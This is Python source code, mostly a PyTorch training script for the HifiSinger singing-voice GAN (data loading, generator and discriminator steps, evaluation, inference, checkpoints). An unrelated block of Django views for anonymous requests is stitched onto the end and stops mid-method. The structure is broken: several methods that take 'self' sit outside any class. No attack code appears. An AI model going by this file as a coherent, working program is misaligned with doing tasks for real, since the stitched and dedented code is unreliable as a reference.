    def Datset_Generate(self):
        """Build train/eval/inference datasets and their DataLoaders.

        (Name typo "Datset" is kept: other methods in this class call it.)
        """
        # Token table mapping text tokens to ids, loaded from YAML.
        token_Dict = yaml.load(open(self.hp.Token_Path), Loader=yaml.Loader)
        train_Dataset = Dataset(
            pattern_path= self.hp.Train.Train_Pattern.Path,
            Metadata_file= self.hp.Train.Train_Pattern.Metadata_File,
            token_dict= token_Dict,
            accumulated_dataset_epoch= self.hp.Train.Train_Pattern.Accumulated_Dataset_Epoch,
            use_cache = self.hp.Train.Use_Pattern_Cache
            )
        eval_Dataset = Dataset(
            pattern_path= self.hp.Train.Eval_Pattern.Path,
            Metadata_file= self.hp.Train.Eval_Pattern.Metadata_File,
            token_dict= token_Dict,
            use_cache = self.hp.Train.Use_Pattern_Cache
            )
        inference_Dataset = Inference_Dataset(
            token_dict= token_Dict,
            pattern_paths= ['./Inference_for_Training/Example.txt', './Inference_for_Training/Example2.txt'],
            use_cache= False
            )
        # Only rank 0 logs dataset sizes.
        if self.gpu_id == 0:
            logging.info('The number of train patterns = {}.'.format(train_Dataset.base_Length))
            logging.info('The number of development patterns = {}.'.format(eval_Dataset.base_Length))
            logging.info('The number of inference patterns = {}.'.format(len(inference_Dataset)))
        collater = Collater(
            token_dict= token_Dict,
            max_abs_mel= self.hp.Sound.Max_Abs_Mel
            )
        inference_Collater = Inference_Collater(
            token_dict= token_Dict,
            max_abs_mel= self.hp.Sound.Max_Abs_Mel
            )
        self.dataLoader_Dict = {}
        # Train loader shards across GPUs when multi-GPU is enabled; eval
        # and inference loaders always run single-process samplers.
        self.dataLoader_Dict['Train'] = torch.utils.data.DataLoader(
            dataset= train_Dataset,
            sampler= torch.utils.data.DistributedSampler(train_Dataset, shuffle= True) \
                if self.hp.Use_Multi_GPU else \
                torch.utils.data.RandomSampler(train_Dataset),
            collate_fn= collater,
            batch_size= self.hp.Train.Batch_Size,
            num_workers= self.hp.Train.Num_Workers,
            pin_memory= True
            )
        self.dataLoader_Dict['Eval'] = torch.utils.data.DataLoader(
            dataset= eval_Dataset,
            sampler= torch.utils.data.RandomSampler(eval_Dataset),
            collate_fn= collater,
            batch_size= self.hp.Train.Batch_Size,
            num_workers= self.hp.Train.Num_Workers,
            pin_memory= True
            )
        self.dataLoader_Dict['Inference'] = torch.utils.data.DataLoader(
            dataset= inference_Dataset,
            sampler= torch.utils.data.SequentialSampler(inference_Dataset),
            collate_fn= inference_Collater,
            batch_size= self.hp.Inference_Batch_Size or self.hp.Train.Batch_Size,
            num_workers= self.hp.Train.Num_Workers,
            pin_memory= True
            )
    def Model_Generate(self):
        """Instantiate models, criteria, optimizers, schedulers, the AMP
        scaler and (optionally) a TorchScript vocoder."""
        self.model_Dict = {
            'Generator': HifiSinger(self.hp).to(self.device),
            'Discriminator': Discriminators(self.hp).to(self.device)
            }
        # Gradients are enabled selectively per phase inside Train_Step.
        self.model_Dict['Generator'].requires_grad_(False)
        self.model_Dict['Discriminator'].requires_grad_(False)
        self.criterion_Dict = {
            'Mean_Absolute_Error': torch.nn.L1Loss(reduction= 'none').to(self.device),
            'Gradient_Penalty': Gradient_Penalty(
                gamma= self.hp.Train.Discriminator_Gradient_Panelty_Gamma
                ).to(self.device),
            }
        self.optimizer_Dict = {
            'Generator': RAdam(
                params= self.model_Dict['Generator'].parameters(),
                lr= self.hp.Train.Learning_Rate.Generator.Initial,
                betas=(self.hp.Train.ADAM.Beta1, self.hp.Train.ADAM.Beta2),
                eps= self.hp.Train.ADAM.Epsilon,
                weight_decay= self.hp.Train.Weight_Decay
                ),
            'Discriminator': RAdam(
                params= self.model_Dict['Discriminator'].parameters(),
                lr= self.hp.Train.Learning_Rate.Discriminator.Initial,
                betas=(self.hp.Train.ADAM.Beta1, self.hp.Train.ADAM.Beta2),
                eps= self.hp.Train.ADAM.Epsilon,
                weight_decay= self.hp.Train.Weight_Decay
                )
            }
        self.scheduler_Dict = {
            'Generator': Modified_Noam_Scheduler(
                optimizer= self.optimizer_Dict['Generator'],
                base= self.hp.Train.Learning_Rate.Generator.Base
                ),
            'Discriminator': Modified_Noam_Scheduler(
                optimizer= self.optimizer_Dict['Discriminator'],
                base= self.hp.Train.Learning_Rate.Discriminator.Base
                )
            }
        self.scaler = torch.cuda.amp.GradScaler(enabled= self.hp.Use_Mixed_Precision)
        # Optional external vocoder for rendering waveforms at inference.
        self.vocoder = None
        if not self.hp.Vocoder_Path is None:
            self.vocoder = torch.jit.load(self.hp.Vocoder_Path).to(self.device)
        if self.gpu_id == 0:
            logging.info('#' * 100)
            logging.info('Generator structure')
            logging.info(self.model_Dict['Generator'])
            logging.info('#' * 100)
            logging.info('Discriminator structure')
            logging.info(self.model_Dict['Discriminator'])
    def Train_Step(self, durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths):
        """One GAN training step: a generator update followed by three
        discriminator updates (fake, real, gradient penalty), each under
        AMP autocast with gradient scaling. Losses are accumulated into
        self.scalar_Dict['Train'].
        """
        loss_Dict = {}
        # Move the whole batch to the training device.
        durations = durations.to(self.device, non_blocking=True)
        tokens = tokens.to(self.device, non_blocking=True)
        notes = notes.to(self.device, non_blocking=True)
        token_lengths = token_lengths.to(self.device, non_blocking=True)
        mels = mels.to(self.device, non_blocking=True)
        silences = silences.to(self.device, non_blocking=True)
        pitches = pitches.to(self.device, non_blocking=True)
        mel_lengths = mel_lengths.to(self.device, non_blocking=True)
        with torch.cuda.amp.autocast(enabled= self.hp.Use_Mixed_Precision):
            # Generator loss
            self.optimizer_Dict['Generator'].zero_grad()
            self.model_Dict['Generator'].requires_grad_(True)
            predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations = self.model_Dict['Generator'](
                durations= durations,
                tokens= tokens,
                notes= notes,
                token_lengths= token_lengths
                )
            discriminations = self.model_Dict['Discriminator'](predicted_Mels, mel_lengths)
            # Reconstruction losses are normalized by the true mel lengths.
            loss_Dict['Mel'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Mels, mels)
            loss_Dict['Mel'] = loss_Dict['Mel'].sum(dim= 2).mean(dim=1) / mel_lengths.float()
            loss_Dict['Mel'] = loss_Dict['Mel'].mean()
            loss_Dict['Silence'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Silences, silences) # BCE is faster, but loss increase infinity because the silence cannot tracking perfectly.
            loss_Dict['Silence'] = loss_Dict['Silence'].sum(dim= 1) / mel_lengths.float()
            loss_Dict['Silence'] = loss_Dict['Silence'].mean()
            loss_Dict['Pitch'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Pitches, pitches)
            loss_Dict['Pitch'] = loss_Dict['Pitch'].sum(dim= 1) / mel_lengths.float()
            loss_Dict['Pitch'] = loss_Dict['Pitch'].mean()
            loss_Dict['Predicted_Duration'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Durations, durations.float()).mean()
            # Non-saturating adversarial loss summed over all discriminators.
            loss_Dict['Adversarial'] = torch.stack([torch.nn.functional.softplus(-x).mean() for x in discriminations]).sum()
            loss_Dict['Generator'] = loss_Dict['Mel'] + loss_Dict['Silence'] + loss_Dict['Pitch'] + loss_Dict['Predicted_Duration'] + loss_Dict['Adversarial']
        self.scaler.scale(loss_Dict['Generator']).backward()
        if self.hp.Train.Gradient_Norm > 0.0:
            # Unscale before clipping so the norm is measured on true grads.
            self.scaler.unscale_(self.optimizer_Dict['Generator'])
            torch.nn.utils.clip_grad_norm_(
                parameters= self.model_Dict['Generator'].parameters(),
                max_norm= self.hp.Train.Gradient_Norm
                )
        self.model_Dict['Generator'].requires_grad_(False)
        self.scaler.step(self.optimizer_Dict['Generator'])
        self.scaler.update()
        self.scheduler_Dict['Generator'].step()
        with torch.cuda.amp.autocast(enabled= self.hp.Use_Mixed_Precision):
            # Fake discrimination
            self.optimizer_Dict['Discriminator'].zero_grad()
            self.model_Dict['Discriminator'].requires_grad_(True)
            fakes, *_ = self.model_Dict['Generator'](
                durations= durations,
                tokens= tokens,
                notes= notes,
                token_lengths= token_lengths
                )
            discriminations = self.model_Dict['Discriminator'](fakes, mel_lengths)
            loss_Dict['Fake'] = torch.stack([torch.nn.functional.softplus(x).mean() for x in discriminations]).sum()
        self.scaler.scale(loss_Dict['Fake']).backward()
        if self.hp.Train.Gradient_Norm > 0.0:
            self.scaler.unscale_(self.optimizer_Dict['Discriminator'])
            torch.nn.utils.clip_grad_norm_(
                parameters= self.model_Dict['Discriminator'].parameters(),
                max_norm= self.hp.Train.Gradient_Norm
                )
        self.model_Dict['Discriminator'].requires_grad_(False)
        self.scaler.step(self.optimizer_Dict['Discriminator'])
        self.scaler.update()
        self.scheduler_Dict['Discriminator'].step()
        with torch.cuda.amp.autocast(enabled= self.hp.Use_Mixed_Precision):
            # Real discrimination
            self.optimizer_Dict['Discriminator'].zero_grad()
            self.model_Dict['Discriminator'].requires_grad_(True)
            discriminations = self.model_Dict['Discriminator'](mels, mel_lengths)
            loss_Dict['Real'] = torch.stack([torch.nn.functional.softplus(-x).mean() for x in discriminations]).sum()
        self.scaler.scale(loss_Dict['Real']).backward()
        if self.hp.Train.Gradient_Norm > 0.0:
            self.scaler.unscale_(self.optimizer_Dict['Discriminator'])
            torch.nn.utils.clip_grad_norm_(
                parameters= self.model_Dict['Discriminator'].parameters(),
                max_norm= self.hp.Train.Gradient_Norm
                )
        self.model_Dict['Discriminator'].requires_grad_(False)
        self.scaler.step(self.optimizer_Dict['Discriminator'])
        self.scaler.update()
        self.scheduler_Dict['Discriminator'].step()
        with torch.cuda.amp.autocast(enabled= self.hp.Use_Mixed_Precision):
            # Gradient penalty
            reals_for_GP = mels.detach().requires_grad_(True)   # This is required to calculate the gradient penalties.
            self.optimizer_Dict['Discriminator'].zero_grad()
            self.model_Dict['Discriminator'].requires_grad_(True)
            discriminations = self.model_Dict['Discriminator'](reals_for_GP, mel_lengths)
            loss_Dict['Gradient_Penalty'] = self.criterion_Dict['Gradient_Penalty'](
                reals= reals_for_GP,
                discriminations= torch.stack(discriminations, dim= -1).sum(dim= (1,2,3))
                )
        self.scaler.scale(loss_Dict['Gradient_Penalty']).backward()
        if self.hp.Train.Gradient_Norm > 0.0:
            self.scaler.unscale_(self.optimizer_Dict['Discriminator'])
            torch.nn.utils.clip_grad_norm_(
                parameters= self.model_Dict['Discriminator'].parameters(),
                max_norm= self.hp.Train.Gradient_Norm
                )
        self.model_Dict['Discriminator'].requires_grad_(False)
        self.scaler.step(self.optimizer_Dict['Discriminator'])
        self.scaler.update()
        self.scheduler_Dict['Discriminator'].step()
        self.steps += 1
        self.tqdm.update(1)
        # Accumulate (cross-GPU-reduced) losses for periodic logging.
        for tag, loss in loss_Dict.items():
            loss = reduce_tensor(loss.data, self.num_gpus).item() if self.num_gpus > 1 else loss.item()
            self.scalar_Dict['Train']['Loss/{}'.format(tag)] += loss
    def Train_Epoch(self):
        """Run one pass over the train loader, firing checkpoint, logging,
        evaluation and inference hooks at their configured step intervals."""
        for durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths in self.dataLoader_Dict['Train']:
            self.Train_Step(durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths)
            if self.steps % self.hp.Train.Checkpoint_Save_Interval == 0:
                self.Save_Checkpoint()
            if self.steps % self.hp.Train.Logging_Interval == 0:
                # Average the accumulated losses over the logging window,
                # write them out, then reset the accumulator.
                self.scalar_Dict['Train'] = {
                    tag: loss / self.hp.Train.Logging_Interval
                    for tag, loss in self.scalar_Dict['Train'].items()
                    }
                self.scalar_Dict['Train']['Learning_Rate/Generator'] = self.scheduler_Dict['Generator'].get_last_lr()
                self.scalar_Dict['Train']['Learning_Rate/Discriminator'] = self.scheduler_Dict['Discriminator'].get_last_lr()
                self.writer_Dict['Train'].add_scalar_dict(self.scalar_Dict['Train'], self.steps)
                self.scalar_Dict['Train'] = defaultdict(float)
            if self.steps % self.hp.Train.Evaluation_Interval == 0:
                self.Evaluation_Epoch()
            if self.steps % self.hp.Train.Inference_Interval == 0:
                self.Inference_Epoch()
            if self.steps >= self.hp.Train.Max_Step:
                return
# @torch.no_grad() Gradient needs to calculate gradient penalty losses.
    def Evaluation_Step(self, durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths):
        """Compute every training loss on one eval batch without taking
        optimizer steps; returns the generator predictions for plotting.
        (Not wrapped in @torch.no_grad(): the gradient-penalty term needs
        gradients — see the comment above this method.)
        """
        loss_Dict = {}
        durations = durations.to(self.device, non_blocking=True)
        tokens = tokens.to(self.device, non_blocking=True)
        notes = notes.to(self.device, non_blocking=True)
        token_lengths = token_lengths.to(self.device, non_blocking=True)
        mels = mels.to(self.device, non_blocking=True)
        silences = silences.to(self.device, non_blocking=True)
        pitches = pitches.to(self.device, non_blocking=True)
        mel_lengths = mel_lengths.to(self.device, non_blocking=True)
        # Generator loss
        predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations = self.model_Dict['Generator'](
            durations= durations,
            tokens= tokens,
            notes= notes,
            token_lengths= token_lengths
            )
        discriminations = self.model_Dict['Discriminator'](predicted_Mels, mel_lengths)
        loss_Dict['Mel'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Mels, mels)
        loss_Dict['Mel'] = loss_Dict['Mel'].sum(dim= 2).mean(dim=1) / mel_lengths.float()
        loss_Dict['Mel'] = loss_Dict['Mel'].mean()
        loss_Dict['Silence'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Silences, silences) # BCE is faster, but loss increase infinity because the silence cannot tracking perfectly.
        loss_Dict['Silence'] = loss_Dict['Silence'].sum(dim= 1) / mel_lengths.float()
        loss_Dict['Silence'] = loss_Dict['Silence'].mean()
        loss_Dict['Pitch'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Pitches, pitches)
        loss_Dict['Pitch'] = loss_Dict['Pitch'].sum(dim= 1) / mel_lengths.float()
        loss_Dict['Pitch'] = loss_Dict['Pitch'].mean()
        loss_Dict['Predicted_Duration'] = self.criterion_Dict['Mean_Absolute_Error'](predicted_Durations, durations.float()).mean()
        loss_Dict['Adversarial'] = torch.stack([torch.nn.functional.softplus(-x).mean() for x in discriminations]).sum()
        loss_Dict['Generator'] = loss_Dict['Mel'] + loss_Dict['Silence'] + loss_Dict['Pitch'] + loss_Dict['Predicted_Duration'] + loss_Dict['Adversarial']
        # Fake discrimination
        fakes, *_ = self.model_Dict['Generator'](
            durations= durations,
            tokens= tokens,
            notes= notes,
            token_lengths= token_lengths
            )
        discriminations = self.model_Dict['Discriminator'](fakes, mel_lengths)
        loss_Dict['Fake'] = torch.stack([torch.nn.functional.softplus(x).mean() for x in discriminations]).sum()
        # Real discrimination
        discriminations = self.model_Dict['Discriminator'](mels, mel_lengths)
        loss_Dict['Real'] = torch.stack([torch.nn.functional.softplus(-x).mean() for x in discriminations]).sum()
        # Gradient penalty
        reals_for_GP = mels.detach().requires_grad_(True)   # This is required to calculate the gradient penalties.
        self.optimizer_Dict['Discriminator'].zero_grad()
        self.model_Dict['Discriminator'].requires_grad_(True)
        discriminations = self.model_Dict['Discriminator'](reals_for_GP, mel_lengths)
        loss_Dict['Gradient_Penalty'] = self.criterion_Dict['Gradient_Penalty'](
            reals= reals_for_GP,
            discriminations= torch.stack(discriminations, dim= -1).sum(dim= (1,2,3))
            )
        # Leave the discriminator frozen and drop the penalty gradients.
        self.model_Dict['Discriminator'].requires_grad_(False)
        self.optimizer_Dict['Discriminator'].zero_grad()
        # Accumulate (cross-GPU-reduced) losses for evaluation logging.
        for tag, loss in loss_Dict.items():
            loss = reduce_tensor(loss.data, self.num_gpus).item() if self.num_gpus > 1 else loss.item()
            self.scalar_Dict['Evaluation']['Loss/{}'.format(tag)] += loss
        return predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations
    def Evaluation_Epoch(self):
        """Run the whole eval loader (rank 0 only), then log averaged
        scalars, model histograms, and plots for the last batch."""
        if self.gpu_id != 0:
            return
        logging.info('(Steps: {}) Start evaluation in GPU {}.'.format(self.steps, self.gpu_id))
        self.model_Dict['Generator'].eval()
        self.model_Dict['Discriminator'].eval()
        for step, (durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths) in tqdm(
            enumerate(self.dataLoader_Dict['Eval'], 1),
            desc='[Evaluation]',
            total= math.ceil(len(self.dataLoader_Dict['Eval'].dataset) / self.hp.Train.Batch_Size)
            ):
            predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations = self.Evaluation_Step(durations, tokens, notes, token_lengths, mels, silences, pitches, mel_lengths)
        # Average the accumulated losses over the number of eval batches.
        self.scalar_Dict['Evaluation'] = {
            tag: loss / step
            for tag, loss in self.scalar_Dict['Evaluation'].items()
            }
        self.writer_Dict['Evaluation'].add_scalar_dict(self.scalar_Dict['Evaluation'], self.steps)
        self.writer_Dict['Evaluation'].add_histogram_model(self.model_Dict['Generator'], 'Generator', self.steps, delete_keywords=['layer_Dict', 'layer'])
        self.writer_Dict['Evaluation'].add_histogram_model(self.model_Dict['Discriminator'], 'Discriminator', self.steps, delete_keywords=['layer_Dict', 'layer'])
        self.scalar_Dict['Evaluation'] = defaultdict(float)
        # Expand token-level durations into per-frame indices for plotting
        # the last sample of the last batch.
        duration = durations[-1]
        duration = torch.arange(duration.size(0)).repeat_interleave(duration.cpu()).numpy()
        predicted_Duration = predicted_Durations[-1].ceil().long().clamp(0, self.hp.Max_Duration)
        predicted_Duration = torch.arange(predicted_Duration.size(0)).repeat_interleave(predicted_Duration.cpu()).numpy()
        image_Dict = {
            'Mel/Target': (mels[-1, :, :mel_lengths[-1]].cpu().numpy(), None),
            'Mel/Prediction': (predicted_Mels[-1, :, :mel_lengths[-1]].cpu().numpy(), None),
            'Silence/Target': (silences[-1, :mel_lengths[-1]].cpu().numpy(), None),
            'Silence/Prediction': (predicted_Silences[-1, :mel_lengths[-1]].cpu().numpy(), None),
            'Pitch/Target': (pitches[-1, :mel_lengths[-1]].cpu().numpy(), None),
            'Pitch/Prediction': (predicted_Pitches[-1, :mel_lengths[-1]].cpu().numpy(), None),
            'Duration/Target': (duration, None),
            'Duration/Prediction': (predicted_Duration, None),
            }
        self.writer_Dict['Evaluation'].add_image_dict(image_Dict, self.steps)
        self.model_Dict['Generator'].train()
        self.model_Dict['Discriminator'].train()
    @torch.no_grad()
    def Inference_Step(self, durations, tokens, notes, token_lengths, labels, start_index= 0, tag_step= False):
        """Generate mels for one inference batch, save diagnostic PNGs and
        mel NPY files, and (when a vocoder is loaded) render wav files.

        Args:
            labels: per-sample names used to build output file names.
            start_index: offset added to each sample's index in file names.
            tag_step: when True, prefix file names with the current step.
        """
        durations = durations.to(self.device, non_blocking=True)
        tokens = tokens.to(self.device, non_blocking=True)
        notes = notes.to(self.device, non_blocking=True)
        token_lengths = token_lengths.to(self.device, non_blocking=True)
        predicted_Mels, predicted_Silences, predicted_Pitches, predicted_Durations = self.model_Dict['Generator'](
            durations= durations,
            tokens= tokens,
            notes= notes,
            token_lengths = token_lengths
            )
        # Build one dotted file stem per sample: [Step-N.]label.IDX_i
        files = []
        for index, label in enumerate(labels):
            tags = []
            if tag_step: tags.append('Step-{}'.format(self.steps))
            tags.append(label)
            tags.append('IDX_{}'.format(index + start_index))
            files.append('.'.join(tags))
        os.makedirs(os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'PNG').replace('\\', '/'), exist_ok= True)
        os.makedirs(os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'NPY', 'Mel').replace('\\', '/'), exist_ok= True)
        for mel, silence, pitch, duration, label, file in zip(
            predicted_Mels.cpu(),
            predicted_Silences.cpu(),
            predicted_Pitches.cpu(),
            predicted_Durations.cpu(),
            labels,
            files
            ):
            # 4-row diagnostic figure: mel, silence, pitch, duration.
            title = 'Note infomation: {}'.format(label)
            new_Figure = plt.figure(figsize=(20, 5 * 4), dpi=100)
            plt.subplot2grid((4, 1), (0, 0))
            plt.imshow(mel, aspect='auto', origin='lower')
            plt.title('Mel {}'.format(title))
            plt.colorbar()
            plt.subplot2grid((4, 1), (1, 0))
            plt.plot(silence)
            plt.margins(x= 0)
            plt.title('Silence {}'.format(title))
            plt.colorbar()
            plt.subplot2grid((4, 1), (2, 0))
            plt.plot(pitch)
            plt.margins(x= 0)
            plt.title('Pitch {}'.format(title))
            plt.colorbar()
            # Expand token durations into per-frame indices for plotting.
            duration = duration.ceil().long().clamp(0, self.hp.Max_Duration)
            duration = torch.arange(duration.size(0)).repeat_interleave(duration)
            plt.subplot2grid((4, 1), (3, 0))
            plt.plot(duration)
            plt.margins(x= 0)
            plt.title('Duration {}'.format(title))
            plt.colorbar()
            plt.tight_layout()
            plt.savefig(os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'PNG', '{}.png'.format(file)).replace('\\', '/'))
            plt.close(new_Figure)
            np.save(
                os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'NPY', 'Mel', file).replace('\\', '/'),
                mel.T,
                allow_pickle= False
                )
        # This part may be changed depending on the vocoder used.
        if not self.vocoder is None:
            os.makedirs(os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'Wav').replace('\\', '/'), exist_ok= True)
            for mel, silence, pitch, file in zip(predicted_Mels, predicted_Silences, predicted_Pitches, files):
                mel = mel.unsqueeze(0)
                silence = silence.unsqueeze(0)
                pitch = pitch.unsqueeze(0)
                # Noise input sized to one sample per frame-shift per frame.
                x = torch.randn(size=(mel.size(0), self.hp.Sound.Frame_Shift * mel.size(2))).to(mel.device)
                mel = torch.nn.functional.pad(mel, (2,2), 'reflect')
                silence = torch.nn.functional.pad(silence.unsqueeze(dim= 1), (2,2), 'reflect').squeeze(dim= 1)
                pitch = torch.nn.functional.pad(pitch.unsqueeze(dim= 1), (2,2), 'reflect').squeeze(dim= 1)
                wav = self.vocoder(x, mel, silence, pitch).cpu().numpy()[0]
                wavfile.write(
                    filename= os.path.join(self.hp.Inference_Path, 'Step-{}'.format(self.steps), 'Wav', '{}.wav'.format(file)).replace('\\', '/'),
                    data= (np.clip(wav, -1.0 + 1e-7, 1.0 - 1e-7) * 32767.5).astype(np.int16),
                    rate= self.hp.Sound.Sample_Rate
                    )
    def Inference_Epoch(self):
        """Run the whole inference loader (rank 0 only) in eval mode."""
        if self.gpu_id != 0:
            return
        logging.info('(Steps: {}) Start inference in GPU {}.'.format(self.steps, self.gpu_id))
        self.model_Dict['Generator'].eval()
        for step, (durations, tokens, notes, token_lengths, labels) in tqdm(
            enumerate(self.dataLoader_Dict['Inference']),
            desc='[Inference]',
            total= math.ceil(len(self.dataLoader_Dict['Inference'].dataset) / (self.hp.Inference_Batch_Size or self.hp.Train.Batch_Size))
            ):
            # Offset sample indices so file names stay unique across batches.
            self.Inference_Step(durations, tokens, notes, token_lengths, labels, start_index= step * (self.hp.Inference_Batch_Size or self.hp.Train.Batch_Size))
        self.model_Dict['Generator'].train()
def Load_Checkpoint(self):
    """Restore models, optimizers, schedulers and the step counter.

    When self.steps == 0, the most recently created '*.pt' file under the
    checkpoint root is loaded (or nothing, for a fresh run); otherwise the
    checkpoint 'S_<steps>.pt' is loaded explicitly.
    """
    if self.steps == 0:
        paths = [
            os.path.join(root, file).replace('\\', '/')
            for root, _, files in os.walk(self.hp.Checkpoint_Path)
            for file in files
            if os.path.splitext(file)[1] == '.pt'
            ]
        if len(paths) > 0:
            path = max(paths, key= os.path.getctime)
        else:
            return  # Initial training
    else:
        # Bug fix: the .replace('\\', '/') was parenthesized onto the file
        # name only (a no-op) instead of the joined path.
        path = os.path.join(self.hp.Checkpoint_Path, 'S_{}.pt'.format(self.steps)).replace('\\', '/')
    state_Dict = torch.load(path, map_location= 'cpu')
    self.model_Dict['Generator'].load_state_dict(state_Dict['Generator']['Model'])
    self.model_Dict['Discriminator'].load_state_dict(state_Dict['Discriminator']['Model'])
    self.optimizer_Dict['Generator'].load_state_dict(state_Dict['Generator']['Optimizer'])
    self.optimizer_Dict['Discriminator'].load_state_dict(state_Dict['Discriminator']['Optimizer'])
    self.scheduler_Dict['Generator'].load_state_dict(state_Dict['Generator']['Scheduler'])
    self.scheduler_Dict['Discriminator'].load_state_dict(state_Dict['Discriminator']['Scheduler'])
    self.steps = state_Dict['Steps']
    logging.info('Checkpoint loaded at {} steps in GPU {}.'.format(self.steps, self.gpu_id))
def Save_Checkpoint(self):
    """Persist models, optimizers, schedulers and the step counter to
    'S_<steps>.pt' under the checkpoint root (rank-0 process only)."""
    if self.gpu_id != 0:
        return
    os.makedirs(self.hp.Checkpoint_Path, exist_ok= True)
    state_Dict = {
        'Generator': {
            # Unwrap the DistributedDataParallel .module when multi-GPU is on.
            'Model': self.model_Dict['Generator'].module.state_dict() if self.hp.Use_Multi_GPU else self.model_Dict['Generator'].state_dict(),
            'Optimizer': self.optimizer_Dict['Generator'].state_dict(),
            'Scheduler': self.scheduler_Dict['Generator'].state_dict(),
            },
        'Discriminator': {
            'Model': self.model_Dict['Discriminator'].module.state_dict() if self.hp.Use_Multi_GPU else self.model_Dict['Discriminator'].state_dict(),
            'Optimizer': self.optimizer_Dict['Discriminator'].state_dict(),
            'Scheduler': self.scheduler_Dict['Discriminator'].state_dict(),
            },
        'Steps': self.steps
        }
    # Bug fix: the .replace('\\', '/') was parenthesized onto the file name
    # only (a no-op) instead of the joined path.
    torch.save(
        state_Dict,
        os.path.join(self.hp.Checkpoint_Path, 'S_{}.pt'.format(self.steps)).replace('\\', '/')
        )
    logging.info('Checkpoint saved at {} steps.'.format(self.steps))
def _Set_Distribution(self):
    # Wrap the model for gradient all-reduce when training on multiple GPUs.
    # NOTE(review): this reads/writes `self.model`, while the rest of this
    # trainer uses `self.model_Dict` — confirm `self.model` exists.
    if self.num_gpus > 1:
        self.model = apply_gradient_allreduce(self.model)
def Train(self):
    """Training driver: snapshot the hyper-parameter file, optionally run an
    initial evaluation/inference pass, then train until Max_Step."""
    hp_Path = os.path.join(self.hp.Checkpoint_Path, 'Hyper_Parameters.yaml').replace('\\', '/')
    # Keep a copy of the hyper-parameters next to the checkpoints once.
    if not os.path.exists(hp_Path):
        from shutil import copyfile
        os.makedirs(self.hp.Checkpoint_Path, exist_ok= True)
        copyfile(self.hp_Path, hp_Path)
    if self.steps == 0:
        self.Evaluation_Epoch()
    if self.hp.Train.Initial_Inference:
        self.Inference_Epoch()
    self.tqdm = tqdm(initial= self.steps, total= self.hp.Train.Max_Step, desc='[Training]')
    while self.steps < self.hp.Train.Max_Step:
        try:
            self.Train_Epoch()
        except KeyboardInterrupt:
            # Save progress before bailing out on Ctrl-C.
            self.Save_Checkpoint()
            exit(1)
    self.tqdm.close()
    logging.info('Finished training.')
if __name__ == '__main__':
    # Command-line entry point: parse args, load hyper-parameters, pin the
    # visible CUDA devices, then start training.
    parser = argparse.ArgumentParser()
    parser.add_argument('-hp', '--hyper_parameters', required= True, type= str)
    parser.add_argument('-s', '--steps', default= 0, type= int)
    parser.add_argument('-p', '--port', default= 54321, type= int)
    parser.add_argument('-r', '--local_rank', default= 0, type= int)
    args = parser.parse_args()

    hp = Recursive_Parse(yaml.load(
        open(args.hyper_parameters, encoding='utf-8'),
        Loader=yaml.Loader
        ))
    os.environ['CUDA_VISIBLE_DEVICES'] = hp.Device

    if hp.Use_Multi_GPU:
        # NOTE(review): this branch only initializes the process group and
        # never constructs a Trainer or calls Train() — confirm whether
        # multi-GPU training is expected to happen here too.
        init_distributed(
            rank= int(os.getenv('RANK', '0')),
            num_gpus= int(os.getenv("WORLD_SIZE", '1')),
            dist_backend= 'nccl',
            dist_url= 'tcp://127.0.0.1:{}'.format(args.port)
            )
    else:
        new_Trainer = Trainer(hp_path= args.hyper_parameters, steps= args.steps)
        new_Trainer.Train()
from datetime import time
from django.contrib.auth import get_user_model
from dlcf_anonymous_request.users.models import AnonymousMessage
from dlcf_anonymous_request.users.forms import RequestCreateForm
from django.shortcuts import render
# from django.urls import reverse
from django.forms.models import BaseModelForm
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.urls import reverse, reverse_lazy
from django.utils.translation import gettext_lazy as _
from django.views.generic import DetailView, RedirectView, UpdateView, CreateView
from django.http import HttpResponse, HttpResponseRedirect
# Resolve the project's active user model once at import time.
User = get_user_model()
class UserDetailView(LoginRequiredMixin, DetailView):
    """Read-only profile page for a single user, looked up by username."""

    model = User
    # Resolve the object from the `username` URL kwarg instead of the pk.
    slug_field = "username"
    slug_url_kwarg = "username"


user_detail_view = UserDetailView.as_view()
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
    """Let the logged-in user edit their own profile (name field only)."""

    model = User
    fields = ["name"]
    success_message = _("Information successfully updated")

    def get_success_url(self):
        # Return to the user's own detail page after a successful update.
        return self.request.user.get_absolute_url()  # type: ignore [union-attr]

    def get_object(self):
        # Always edit the authenticated user; any pk/slug in the URL is ignored.
        return self.request.user


user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
    """Temporary redirect from a generic URL to the current user's detail page."""

    permanent = False  # issue a 302, not a 301

    def get_redirect_url(self):
        return reverse("users:detail", kwargs={"username": self.request.user.username})


user_redirect_view = UserRedirectView.as_view()
class RequestCreateView(CreateView):
    """Anonymous request submission rendered on the home page."""

    def get(self, request, *args, **kwargs):
        """Show an empty request form."""
        context = {'form': RequestCreateForm()}
        return render(request, 'pages/home.html', context)

    def post(self, request, *args, **kwargs):
        """Validate and persist the submitted request, then redirect to the
        success page; re-render the form with errors otherwise."""
        form = RequestCreateForm(request.POST)
        if form.is_valid():
            # Bug fix: form.save() already persists the instance; the old code
            # called .save() a second time on the returned object, writing the
            # same row to the database twice.
            form.save()
